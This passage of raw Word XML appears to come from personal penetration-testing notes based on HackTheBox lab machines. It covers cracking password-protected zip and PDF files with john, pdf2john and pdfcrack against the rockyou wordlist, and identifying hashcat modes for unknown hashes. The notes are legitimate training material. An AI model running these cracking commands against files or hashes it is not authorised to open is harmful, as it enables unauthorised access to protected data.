          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john -wordlist=/usr/share/wordlists/rockyou.txt ziphash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wordlist might be need two dashes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DB5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john --show ziphash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Output might be something like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DB7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Gungsuh" w:cs="Gungsuh" w:eastAsia="Gungsuh" w:hAnsi="Gungsuh"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">┌──(kali㉿kali)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">└─$ john --show ziphash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">backup.zip:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">741852963</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">::backup.zip:style.css, index.php:backup.zip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, you see that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">741852963 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the output, and we have 2 files (style.css and index.php)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DBB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DBC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DBD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the Ransom HTB:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1074"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7z l -slt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">name.zip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DBF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1074"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This gives you information about the method of encryption and more. It can be seen at the "method" property</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DC0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1074"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The encryption method we saw was "ZipCrypto Deflate"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DC1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1074"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The whole process was pretty complicated since it was to access the Root user. You can look at the writeup for the full process of how they did it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DC2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DC3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DC4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DC5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h7miwicycep5" w:id="250"/>
      <w:bookmarkEnd w:id="250"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cracking PDF files with passwords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DC6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId618">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Nickel</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DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1130"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pdf2john nameOfFile.pdf &gt; pdf.hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1130"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john --wordlist=/usr/share/wordlists/rockyou.txt --rules=best64 pdf.hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1434"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They added the best 64 rules here to add variation to the word list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DCA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DCB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another tool to use to crack it is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pdfcrack</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DCC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="404"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pdfcrack -f nameOfFile.pdf -w /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DCD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="404"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DCE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DCF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can then view the PDF using evince</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DD0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">evince nameOfFile.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DD1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D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D3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DD4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1z1q05a37zji" w:id="251"/>
      <w:bookmarkEnd w:id="251"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HashCat and Hashid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DD5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DD6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Important: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you can't crack a hash, just try and online hash cracker. Like for the BTRSys2.1 PG Play, the MD5 hash couldn't be cracked on Kali, but an online hash cracker got it (crackstation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DD7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ot1oc37mjz6f" w:id="252"/>
      <w:bookmarkEnd w:id="252"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to find the mode needed for a hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DD8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="617"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at the hash. In the first characters of the hash, you might see something in between dollar signs like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$krb15rep$</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DD9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="617"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy and paste that text, and run this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="617"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat ../example-hashes | grep [INSERT TEXT]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DDB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="617"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or go to this website (</w:t>
      </w:r>
      <w:hyperlink r:id="rId619">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://hashcat.net/wiki/doku.php?id=example_hashes</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) and use CTRL + F on the first few letters of the hash to find the mode for the hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DDC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="617"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you get a result, that means hashcat recognizes your hash type. So run this to find the mode for that hash type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DDD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="617"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat ../example-hashes | grep -B5 [INSERT TEXT]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DDE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="617"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will look at the 5 lines before your GREP, which will include the mode information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DDF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="617"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you see the "MODE" in the output, now you can run hashcat with your mode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DE0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="617"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2095500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="486" name="image474.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image474.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62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DE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="617"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Whole process seen here</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="617"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the Blackfield HTB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DE3">
      <w:pPr>
